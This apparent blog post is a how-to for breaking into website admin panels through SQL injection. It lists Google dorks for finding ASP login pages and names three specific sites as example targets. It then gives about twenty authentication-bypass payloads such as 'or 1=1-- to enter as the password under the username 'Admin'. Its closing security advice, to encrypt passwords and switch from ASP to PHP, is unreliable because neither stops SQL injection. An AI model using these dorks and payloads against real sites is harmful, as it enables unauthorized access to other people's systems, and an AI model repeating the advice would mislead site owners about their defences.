How To Hack Website Using SQL Injection

What do we understand by sql injection?

  •  A injecting sql queries into another database or using queries to get authentication bypass as an admin.

1

Part 1

Basic sql injection Gaining authentication bypass on an admin account. Most sites vulnerable to this are .asp, So first we need 2 find a site, start by opening Google.Now we type our dork: “definition of dork” ‘a search entry for a certain type of site/exploit”

There is a large number of google dork for basic sql injection.

Here are the best:

“inurl:admin.asp”

“inurl:login/admin.asp”

“inurl:admin/login.asp”

“inurl:adminlogin.asp”

“inurl:adminhome.asp”

“inurl:admin_login.asp”

“inurl:administratorlogin.asp”

“inurl:login/administrator.asp”

“inurl:administrator_login.asp”

Example are listed below, make sure the url looks like this

http://www.casualtyprotection.com/login-admin.asp

http://login.fanhow.com/login-admin.asp

http://www.normatech.it/login-admin.asp

Now what to do once we get to our site. the site should look something like this :

Welcome to xxxxxxxxxx administrator panel.

Username :

Password :

So what we do here is in the USERNAME, we always type “Admin” as the username and for our PASSWORD we type our sql injection.

Here is a list of sql injections..
‘ or ’1′=’1

‘ or ‘x’=’x

‘ or 0=0 –

or 0=0 –

‘ or 0=0 #

” or 0=0 #

or 0=0 #

‘ or ‘x’=’x

” or “x”=”x

‘) or (‘x’=’x

‘ or 1=1–

” or 1=1–

or 1=1–

‘ or a=a–

” or “a”=”a

‘) or (‘a’=’a

“) or (“a”=”a

hi” or “a”=”a

hi” or 1=1 –

hi’ or 1=1 –

‘or’1=1′

TYPE ANY ONE OF THESE IN PASSWORD SPACE… There are many more but these are the best ones that i know.

what this sql injection is doing :

Confusing the database till it gives you authentication bypass. So your input should look like this


username: Admin

password: ’or’1′=’1

So click submit and you’re in. . oh Wow !! .

NOTE not all sites are vulnerable.

HOW TO SECURE YOUR SITE FROM THIS ATTACK

1- Put encryption on the passwords.

2- Change the platform of your website from asp to .php .

Disclaimer : – it is for education perpose only , Hacking is Crime note this thing.

Advertisements

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s